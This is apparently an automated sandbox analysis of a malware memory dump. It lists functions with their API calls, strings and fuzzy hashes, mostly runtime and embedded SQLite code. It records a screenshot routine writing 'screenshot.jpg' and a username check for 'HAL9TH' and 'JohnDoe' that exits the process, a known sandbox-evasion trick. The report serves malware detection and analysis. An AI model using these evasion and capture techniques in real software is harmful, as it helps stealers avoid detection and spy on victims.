
Uniqueness Score: -1.00%

Function 0046002B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00460033

Part of subcall function 0046949E: __FF_MSGBANNER.LIBCMT ref: 004694B7
Part of subcall function 0046949E: __NMSG_WRITE.LIBCMT ref: 004694BE
Part of subcall function 0046949E: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,00467640,00000001,00000000,?,?,?,0046769E,00402DA3), ref: 004694E3

GetTickCount.KERNEL32 ref: 0046003E

Part of subcall function 0046B2D8: __getptd.LIBCMT ref: 0046B2DD

_rand.LIBCMT ref: 00460053

Part of subcall function 0046B2EA: __getptd.LIBCMT ref: 0046B2EA

_sprintf.LIBCMT ref: 00460066

Strings

%s%d, xrefs: 00460060

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __getptd$AllocateCountHeapTick_malloc_rand_sprintf
String ID: %s%d
API String ID: 2210831635-1110647743
Opcode ID: ebd81e9942656529f1bf291e3e53d0c433d6b17cd07766941c63f639271fd63b
Instruction ID: b7c85840912f775504718487d95ad9a25f9f795e13ef6115174ac58a19cb1077
Opcode Fuzzy Hash: ebd81e9942656529f1bf291e3e53d0c433d6b17cd07766941c63f639271fd63b
Instruction Fuzzy Hash: F9E0A3233042501AD31166ED1C55B3FD79CDFD2365F20085FF10486182FAAC4C4042BB

Uniqueness

Uniqueness Score: -1.00%

Function 0046023A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0046025D
GetSystemMetrics.USER32(00000000), ref: 00460263
GetSystemMetrics.USER32(00000001), ref: 0046026D

Part of subcall function 004601CC: SelectObject.GDI32(00000000,00000000), ref: 004601F5
Part of subcall function 004601CC: DeleteObject.GDI32(00000000), ref: 0046022D

GdiplusShutdown.GDIPLUS(?), ref: 00460287

Strings

screenshot.jpg, xrefs: 00460273

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: GdiplusMetricsObjectSystem$DeleteSelectShutdownStartup
String ID: screenshot.jpg
API String ID: 654883086-673422685
Opcode ID: 5b3162986c4697fce1e4430f1fba1209b6d5023a89b600246d1f2fec9312381a
Instruction ID: 1af3833e20a9f11a21b80a8a3a48868f5a278438c79d68a1c029940001f999b4
Opcode Fuzzy Hash: 5b3162986c4697fce1e4430f1fba1209b6d5023a89b600246d1f2fec9312381a
Instruction Fuzzy Hash: 64F0FEB2901229BACB01ABD69D459DF7BBCEF0574CF100066F501A2142E6B95B008BF6

Uniqueness

Uniqueness Score: -1.00%

Function 00472506, Relevance: 7.5, APIs: 5, Instructions: 34COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00472512

Part of subcall function 004702AD: __getptd_noexit.LIBCMT ref: 004702B0
Part of subcall function 004702AD: __amsg_exit.LIBCMT ref: 004702BD

__getptd.LIBCMT ref: 00472529
__amsg_exit.LIBCMT ref: 00472537
__lock.LIBCMT ref: 00472547
__updatetlocinfoEx_nolock.LIBCMT ref: 0047255B

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: cfe99f6b6122d13a720520f0379b7811e57b010896ee0668d818ea5ad693cd6b
Instruction ID: 64ac73c3bdd66361e25beef97566af3f74c45f5865eb45701def4ea8de851fff
Opcode Fuzzy Hash: cfe99f6b6122d13a720520f0379b7811e57b010896ee0668d818ea5ad693cd6b
Instruction Fuzzy Hash: A0F0F672D01610AAD720B7A6AA13B8E33A06F00728F10C19FF81C672D2DBAC59008A5E

Uniqueness

Uniqueness Score: -1.00%

Function 0046AE19, Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0046E226: _doexit.LIBCMT ref: 0046E232

___set_flsgetvalue.LIBCMT ref: 0046AE2B

Part of subcall function 004700F2: TlsGetValue.KERNEL32(00000001,0047024B,?,?,00467640,00000001,00000000,?,?,?,0046769E,00402DA3), ref: 004700FB
Part of subcall function 004700F2: DecodePointer.KERNEL32(?,?,00467640,00000001,00000000,?,?,?,0046769E,00402DA3), ref: 0047010D
Part of subcall function 004700F2: TlsSetValue.KERNEL32(00000000,?,?,00467640,00000001,00000000,?,?,?,0046769E,00402DA3), ref: 0047011C

___fls_getvalue@4.LIBCMT ref: 0046AE36

Part of subcall function 004700D2: TlsGetValue.KERNEL32(?,?,0046AE3B,00000000), ref: 004700E0

___fls_setvalue@8.LIBCMT ref: 0046AE49

Part of subcall function 00470126: DecodePointer.KERNEL32(?,?,?,0046AE4E,00000000,?,00000000), ref: 00470137

GetLastError.KERNEL32(00000000,?,00000000), ref: 0046AE52
ExitThread.KERNEL32 ref: 0046AE59
GetCurrentThreadId.KERNEL32 ref: 0046AE5F
__freefls@4.LIBCMT ref: 0046AE7F

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
String ID:
API String ID: 781180411-0
Opcode ID: 724e79e0c69c32d251c10ba1002562656be7021b015c08b1beb83b4b931d86d4
Instruction ID: 7c3725abcae04d85c70f16b516ebfe0a626f4419e76570bc70a13ffc9f264464
Opcode Fuzzy Hash: 724e79e0c69c32d251c10ba1002562656be7021b015c08b1beb83b4b931d86d4
Instruction Fuzzy Hash: 4BE08631902645E78F103BF3EC0A9DF3A6C9D00718B00885AB914B3113EF2EE91247AF

Uniqueness

Uniqueness Score: -1.00%

Function 00438AC3, Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 475COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00438B8E
_memmove.LIBCMT ref: 00438E08

Strings

no query solution, xrefs: 00438EA3
, xrefs: 00438E71

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove_memset
String ID: $no query solution
API String ID: 3555123492-326442043
Opcode ID: 06668d158c2cca5802c0bbacb40c73fd3c8089db5bb47b7c88a3430e4b97ba36
Instruction ID: ee04a0efd604c3a55709de041c51f0f62d6c895ec5ebcfa452a9904b60c66288
Opcode Fuzzy Hash: 06668d158c2cca5802c0bbacb40c73fd3c8089db5bb47b7c88a3430e4b97ba36
Instruction Fuzzy Hash: 111297B090071A9FCB14CF99C481AAEFBB1FF58310F14915EF855AB351DB38A981CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0044C675, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 317COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0044C702

Strings

cannot release savepoint - SQL statements in progress, xrefs: 0044C7C9
no such savepoint: %s, xrefs: 0044C79E
cannot open savepoint - SQL statements in progress, xrefs: 0044C697

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove
String ID: cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s
API String ID: 4104443479-3151731220
Opcode ID: 595ddc83f52e6138207490c5cbcb59ab9ee7995435dccf3340a005bea55488b8
Instruction ID: 696a1763685bd86d2e1e7132c5c29d9e78f5c945e75b27bb27af7aa87dcef08f
Opcode Fuzzy Hash: 595ddc83f52e6138207490c5cbcb59ab9ee7995435dccf3340a005bea55488b8
Instruction Fuzzy Hash: 20D12A71900716DFEB64CF69C881BA9B7F1BB44314F24416BD459AB342DB34AD81CF49

Uniqueness

Uniqueness Score: -1.00%

Function 0045605E, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 147COMMON

Download Yara Rule

APIs

Part of subcall function 0042407E: _memset.LIBCMT ref: 0042409D

_memmove.LIBCMT ref: 00456159

Strings

sqlite_altertab_%s, xrefs: 0045612B
virtual tables may not be altered, xrefs: 00456098
Cannot add a column to a view, xrefs: 004560AE

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove_memset
String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
API String ID: 3555123492-2063813899
Opcode ID: cdf4cd13ccab5c872140c9c2590c24440518c0273d59a2df2b42b8ff21c34bc6
Instruction ID: 83164c4f9b6ac61f70b3ed300c70f2fb16a3a09eefacaeb4025e2fb84d5ba1ec
Opcode Fuzzy Hash: cdf4cd13ccab5c872140c9c2590c24440518c0273d59a2df2b42b8ff21c34bc6
Instruction Fuzzy Hash: 0A51A172A00615AFDB10DF69C8417A9BBF0FF08315F51406BEC04DB292EB79EA51CB88

Uniqueness

Uniqueness Score: -1.00%

Function 0042A42A, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0042A46D
_memmove.LIBCMT ref: 0042A485

Strings

winWrite1, xrefs: 0042A581
winWrite2, xrefs: 0042A532

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove
String ID: winWrite1$winWrite2
API String ID: 4104443479-3457389245
Opcode ID: deb3674cd7f5e09482d484a331c5d6495a61673547013303eb4ea9d413472493
Instruction ID: 53d92ad17f1ac65ed845f9d8921504c71b3fe1cac8b846b55d436c84df73d209
Opcode Fuzzy Hash: deb3674cd7f5e09482d484a331c5d6495a61673547013303eb4ea9d413472493
Instruction Fuzzy Hash: D8419071A00219EBCF00DF94DC8569E77B1FF04314F64856AED00A7240D374DAA5CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00430D34, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 116COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 00430DE1

Strings

rowid, xrefs: 00430D97, 00430DB2, 00430E04, 00430E1D, 00430E3D, 00430E56
ANY(%s), xrefs: 00430DD7
AND , xrefs: 00430DC8

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __fprintf_l
String ID: AND $ANY(%s)$rowid
API String ID: 3906573944-2531995277
Opcode ID: cb82717673c9d2791aea68702727a69ab944633403f9d0630890b323cd54008e
Instruction ID: 41e611e4d71897a176fd4360f387ddf737940dfb70f3e7e22717757945cdde95
Opcode Fuzzy Hash: cb82717673c9d2791aea68702727a69ab944633403f9d0630890b323cd54008e
Instruction Fuzzy Hash: B541A135A00215BBCB14EF95C892AAD77F4EB08714F10995BFC04AB291DB7CEE408B98

Uniqueness

Uniqueness Score: -1.00%

Function 00428B20, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 004158CE: __allrem.LIBCMT ref: 004158F7

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00428BC4
__localtime64_s.LIBCMT ref: 00428BE7

Strings

local time unavailable, xrefs: 00428BF4
utc, xrefs: 00428B3A

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__localtime64_s
String ID: local time unavailable$utc
API String ID: 1840914312-1312764671
Opcode ID: ce028d2acc515719706265f803e3eb70b641f70bdc3bd05841236bd025ae747c
Instruction ID: 39af83d78415040ef659582c1b496a948efffdc1f6bd52bbf99be34452425905
Opcode Fuzzy Hash: ce028d2acc515719706265f803e3eb70b641f70bdc3bd05841236bd025ae747c
Instruction Fuzzy Hash: 0A411472A00208DFCF04DF69D8819DE7BE4FF48354F50412AF929A7250DB79E9998B98

Uniqueness

Uniqueness Score: -1.00%

Function 0042A597, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042A5C3

Strings

winTruncate2, xrefs: 0042A66E
winTruncate1, xrefs: 0042A638
winSeekFile, xrefs: 0042A619

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: winSeekFile$winTruncate1$winTruncate2
API String ID: 885266447-2471937615
Opcode ID: 1c8d9ab361d10f395408155b561f57eafaf3d01c2bd75864c8d316e401506e8b
Instruction ID: 642872cf144292ce380656267c1caa355662be5d6ecceb4d4d646ed668637c1d
Opcode Fuzzy Hash: 1c8d9ab361d10f395408155b561f57eafaf3d01c2bd75864c8d316e401506e8b
Instruction Fuzzy Hash: 8531D471700700AFDB20DF64D981A6B73E5EB48354F58852EFA56C7780D734EC108B6A

Uniqueness

Uniqueness Score: -1.00%

Function 0045ED03, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?), ref: 0045ED15
IsWow64Process.KERNEL32(00000000), ref: 0045ED1C

Strings

x86, xrefs: 0045ED32
x64, xrefs: 0045ED2B

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process$CurrentWow64
String ID: x64$x86
API String ID: 1905925150-1778291495
Opcode ID: 29ba9b4bdbb8b530d1599a596f8a1266899db2fe288ac042775a4e6678dc71ce
Instruction ID: 743de020c35635637ffea0b895b0bc22ff823aca2ea793756205292c42492e48
Opcode Fuzzy Hash: 29ba9b4bdbb8b530d1599a596f8a1266899db2fe288ac042775a4e6678dc71ce
Instruction Fuzzy Hash: D2F05E71A0130AABCB109FA5D84465EBBB8EB04B46B54487FE541A3241C2789F089758

Uniqueness

Uniqueness Score: -1.00%

Function 0046A70D, Relevance: 6.1, APIs: 4, Instructions: 130COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0046A7A8
__flush.LIBCMT ref: 0046A7C6
__write.LIBCMT ref: 0046A7ED
__flsbuf.LIBCMT ref: 0046A818

Part of subcall function 0046DC1D: __getptd_noexit.LIBCMT ref: 0046DC1D

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 942dbabadbfdfae57a7228a6fec992bbcd9bf710ad7a599f01ff3c3f9f765826
Instruction ID: 99fd477ee49c171c5577050ce4ac4873b8c1395194221a09395d197efb4badea
Opcode Fuzzy Hash: 942dbabadbfdfae57a7228a6fec992bbcd9bf710ad7a599f01ff3c3f9f765826
Instruction Fuzzy Hash: F341B631A00B04DBDB249F66888565FBBB5EF80355F24812FE415A7240F778ED628F5B

Uniqueness

Uniqueness Score: -1.00%

Function 0047C5EA, Relevance: 6.1, APIs: 4, Instructions: 103COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0047C61E
__isleadbyte_l.LIBCMT ref: 0047C651
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,?,?,00000000,?,00000000), ref: 0047C682
MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,00000000,00000000,?,?,?,00000000,?,00000000), ref: 0047C6F0

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 1f9a13d97f9ff9e9d371f6cdf497ec24dd392e21f3422c53df5f7505a3ba407a
Instruction ID: b4561495634a5b0c3006078bdcec14c795380a58e59b8f9e8402e2d7b0702795
Opcode Fuzzy Hash: 1f9a13d97f9ff9e9d371f6cdf497ec24dd392e21f3422c53df5f7505a3ba407a
Instruction Fuzzy Hash: 9B319D31A00256EFDF20DF68C8C09FE3BA5AF01311B15C56EE4699B291E734DD41DB69

Uniqueness

Uniqueness Score: -1.00%

Function 004600B7, Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 004600CE
_malloc.LIBCMT ref: 004600E1
_free.LIBCMT ref: 00460163

Part of subcall function 00469CC4: RtlFreeHeap.NTDLL(00000000,00000000,?,0047029E,00000000,?,?,00467640,00000001,00000000,?,?,?,0046769E,00402DA3), ref: 00469CDA
Part of subcall function 00469CC4: GetLastError.KERNEL32(00000000,?,0047029E,00000000,?,?,00467640,00000001,00000000,?,?,?,0046769E,00402DA3), ref: 00469CEC

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EncodersErrorFreeGdipHeapImageLastSize_free_malloc
String ID:
API String ID: 34177290-0
Opcode ID: 2aed0e7672fb0a96efddfcfca89bf857d5c40103165effc137df2a4d6f00dbdc
Instruction ID: 2d56ff54f79681364d4f5e1a6a65b0e72e6f3bb7c281cecae8ca0d54260d2aa5
Opcode Fuzzy Hash: 2aed0e7672fb0a96efddfcfca89bf857d5c40103165effc137df2a4d6f00dbdc
Instruction Fuzzy Hash: C8218E72D00128EACB21DFA488804EFB779EF26764B214657E82067391F7379E41DA96

Uniqueness

Uniqueness Score: -1.00%

Function 00404B35, Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00404B3C
_strtok.LIBCMT ref: 00404B50

Part of subcall function 004688ED: __getptd.LIBCMT ref: 0046890B

CreateDirectoryA.KERNEL32(?,00000000,004867F4,00000001,00000000,?,?,?,?,?,?,00000024), ref: 00404B8E
_strtok.LIBCMT ref: 00404B99

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _strtok$CreateDirectoryH_prolog3___getptd
String ID:
API String ID: 2807274917-0
Opcode ID: 7ebbc485fd256d463c43b497327868a2088e4563bdbff4985e3ae37dd39f99d7
Instruction ID: c00c0b13d2eb97a9500ad8ca0f7c6bae2051a4746c57236e8e316e2086169b3d
Opcode Fuzzy Hash: 7ebbc485fd256d463c43b497327868a2088e4563bdbff4985e3ae37dd39f99d7
Instruction Fuzzy Hash: CD0112B1D04209AEDB04FBE5DC96EEE7778AB44314F50842FF211B71C1DA78A9448B6D

Uniqueness

Uniqueness Score: -1.00%

Function 0047C4D7, Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(00000000,00473DAD,00000000,00000000,76D25970,?,00469EDB,0040FD3B,00000000,?,?,?,?,?,?,00000000), ref: 0047C4DA
__malloc_crt.LIBCMT ref: 0047C509
FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,00000000,?,00469EDB,0040FD3B,00000000,?,?,?,?,?,?,00000000,76D681D0), ref: 0047C516

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: e0911e065611a92a0002c30e7df5df5bd357c35197b72f2cd51f601dcd1d5c7e
Instruction ID: c9f8133cabd6fc53cb03a4f754deabf1a4e7ee2ab1e7ae05eb5789f7ed8208f2
Opcode Fuzzy Hash: e0911e065611a92a0002c30e7df5df5bd357c35197b72f2cd51f601dcd1d5c7e
Instruction Fuzzy Hash: B0F02E775041206A8F317B34BCC98EB1738CBD576531AC41FF805C3340F6298E8283AA

Uniqueness

Uniqueness Score: -1.00%

Function 00460290, Relevance: 6.0, APIs: 4, Instructions: 34fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 004602AB
GetFileSizeEx.KERNEL32(00000000,?), ref: 004602C3
CloseHandle.KERNEL32(00000000), ref: 004602CE
CloseHandle.KERNEL32(00000000), ref: 004602D6

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseFileHandle$CreateSize
String ID:
API String ID: 4148174661-0
Opcode ID: 52ee9af0e4d272adebe8ceddfa3e02de93de0e35db65c026b63c00b4c1fbe4a7
Instruction ID: 3929fc40e37e5bf832a2161d2b7940c379898db2911504cee8344e2643e5e6dd
Opcode Fuzzy Hash: 52ee9af0e4d272adebe8ceddfa3e02de93de0e35db65c026b63c00b4c1fbe4a7
Instruction Fuzzy Hash: 08F05E31640214FBE6109B64DC0DF9F3B68AB06B61F204665FA12B22D4F770AF01866E

Uniqueness

Uniqueness Score: -1.00%

Function 00460616, Relevance: 6.0, APIs: 4, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

numpunct.LIBCPMT ref: 00460619
__CxxThrowException@8.LIBCMT ref: 00460622

Part of subcall function 00467D41: RaiseException.KERNEL32(?,?,00402DB8,?,?,?,?,?,00402DB8,?,00495EC8,00000000), ref: 00467D83

GdipCloneImage.GDIPLUS(00000000,00000000), ref: 0046063A
GdipAlloc.GDIPLUS(00000010,00000000,00000000), ref: 00460648

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Gdip$AllocCloneExceptionException@8ImageRaiseThrownumpunct
String ID:
API String ID: 2212125544-0
Opcode ID: 6e1dc8eeb764baa256507b6392ac2f48d3a763622a5971c53bb621712d151485
Instruction ID: 1c918faf767dcd049ce9fe58c869e3565db8942579907732b7633133e67ba1f9
Opcode Fuzzy Hash: 6e1dc8eeb764baa256507b6392ac2f48d3a763622a5971c53bb621712d151485
Instruction Fuzzy Hash: E0F054B1500305AFDB149F51CD42A6B77ECEF40348F14846EAD0557251FB78ED00C65A

Uniqueness

Uniqueness Score: -1.00%

Function 0044E1EA, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0044E395

Strings

too many levels of trigger recursion, xrefs: 0044E233
out of memory, xrefs: 0044F03A

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset
String ID: out of memory$too many levels of trigger recursion
API String ID: 2102423945-3387558265
Opcode ID: e817613e6b9cdfc81c0aad5d4f867e4cefc41331d9d1ba63d486cbade4a42b18
Instruction ID: 6d9d8018e0c231eadf151d56a280d363aa50e131c240ac9881285ff8efbf5509
Opcode Fuzzy Hash: e817613e6b9cdfc81c0aad5d4f867e4cefc41331d9d1ba63d486cbade4a42b18
Instruction Fuzzy Hash: E7814AB5A04615DFDB28CF15D490B99BBB1FF48300F2481AED84A9B786DB34E851CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0043EAE1, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 131COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0043EBBB

Strings

N{A, xrefs: 0043EBD0, 0043EBEC
F@B, xrefs: 0043EB0F, 0043EB57

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset
String ID: F@B$N{A
API String ID: 2102423945-261674976
Opcode ID: 7e0b43fe50ec0e054df14ba368f21b4fa62d7145365396d2df4b06a9756a42e5
Instruction ID: 0c85e3b896153d88fc9cb6b37d602cffde76745b8f866fbd0bb27bc9d469d396
Opcode Fuzzy Hash: 7e0b43fe50ec0e054df14ba368f21b4fa62d7145365396d2df4b06a9756a42e5
Instruction Fuzzy Hash: 77410471505214EFC720BF22BF8256A7324EB7836DF11253FE505462A2E73D1C81AACD

Uniqueness

Uniqueness Score: -1.00%

Function 00404591, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004045D6
_memmove.LIBCMT ref: 00404607

Strings

string too long, xrefs: 004045D1

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 256744135-2556327735
Opcode ID: bf90bdf99d4632acbd7983be2cdf2da1a3094c86e6c13c34d657a2c2e33187b9
Instruction ID: 90df72f4bc0cd57feeb466dfa3493a57e8c7debaaf21933f7ddf2ac7252c12c6
Opcode Fuzzy Hash: bf90bdf99d4632acbd7983be2cdf2da1a3094c86e6c13c34d657a2c2e33187b9
Instruction Fuzzy Hash: E6119371304650ABD6349E2D895092BB7E5EFC1704B140E3FB282672C1DB79D805876A

Uniqueness

Uniqueness Score: -1.00%

Function 00462489, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00462490
std::_Xinvalid_argument.LIBCPMT ref: 004624A7

Part of subcall function 00466492: std::exception::exception.LIBCMT ref: 004664A7
Part of subcall function 00466492: __CxxThrowException@8.LIBCMT ref: 004664BC
Part of subcall function 00466492: std::exception::exception.LIBCMT ref: 004664CD

Strings

vector<T> too long, xrefs: 004624A2

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::exception::exception$Exception@8H_prolog3_catchThrowXinvalid_argumentstd::_
String ID: vector<T> too long
API String ID: 1877048013-3788999226
Opcode ID: 41a194e36f85283fd0c56e974550ae8896338fda2450de8944c9e212ea8c0a02
Instruction ID: f67b13cd1f7c64a3ea541d0528415707fec555d4af96195ef9ba46ad37928bda
Opcode Fuzzy Hash: 41a194e36f85283fd0c56e974550ae8896338fda2450de8944c9e212ea8c0a02
Instruction Fuzzy Hash: FB113A76200700BFC720EF69CD81E1ABBE5EF44700F10882FF58587241EAB5E950CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040CAD2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040CB18
_memmove.LIBCMT ref: 0040CB4E

Strings

string too long, xrefs: 0040CB13

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 256744135-2556327735
Opcode ID: 5be94b7a398abf88fc62a4e399b5a8dfff58b779cc6872d2fe121c1251b8849b
Instruction ID: 5a722604add717640f9ba49502f62fb4648f0657bd417dbaf2d8a42057e76976
Opcode Fuzzy Hash: 5be94b7a398abf88fc62a4e399b5a8dfff58b779cc6872d2fe121c1251b8849b
Instruction Fuzzy Hash: C411AB31304600D7C520EF6D9D85D1BB7B5AFC1714B11072FB442B32D1DB38A905CAA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404249, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 0045F3B7: GetUserNameA.ADVAPI32(?,?), ref: 0045F3EC

ExitProcess.KERNEL32 ref: 004042CA

Strings

HAL9TH, xrefs: 004042A5
JohnDoe, xrefs: 0040426E

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitNameProcessUser
String ID: HAL9TH$JohnDoe
API String ID: 282088302-3469431008
Opcode ID: 9c4a05cbca9e4971742319d63c9630c54ff4adc095b710f6e13af260675afc9e
Instruction ID: a44788af027f9dd1aff2a21de129c884005c5146174d01716b92837e19f9833c
Opcode Fuzzy Hash: 9c4a05cbca9e4971742319d63c9630c54ff4adc095b710f6e13af260675afc9e
Instruction Fuzzy Hash: 9C01A9716452089FEB04EBA5D986FDD73A8EB09704F40047FF502B71E1DE789948C669

Uniqueness

Uniqueness Score: -1.00%

Function 0042CACA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 0042CB0A

Part of subcall function 0042C73A: _memset.LIBCMT ref: 0042C77C

Strings

sqlite_stat%d, xrefs: 0042CB02
DELETE FROM %Q.%s WHERE %s=%Q, xrefs: 0042CB2D

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __fprintf_l_memset
String ID: DELETE FROM %Q.%s WHERE %s=%Q$sqlite_stat%d
API String ID: 4274417252-3667113883
Opcode ID: a32b2e93c0948379f4ad55548d37ef94994081cf509540a596bb87d0bfefca72
Instruction ID: 4e4bbbea80832f861c01b53a8ceed376e17d4579ee15504a17a45272a25a8323
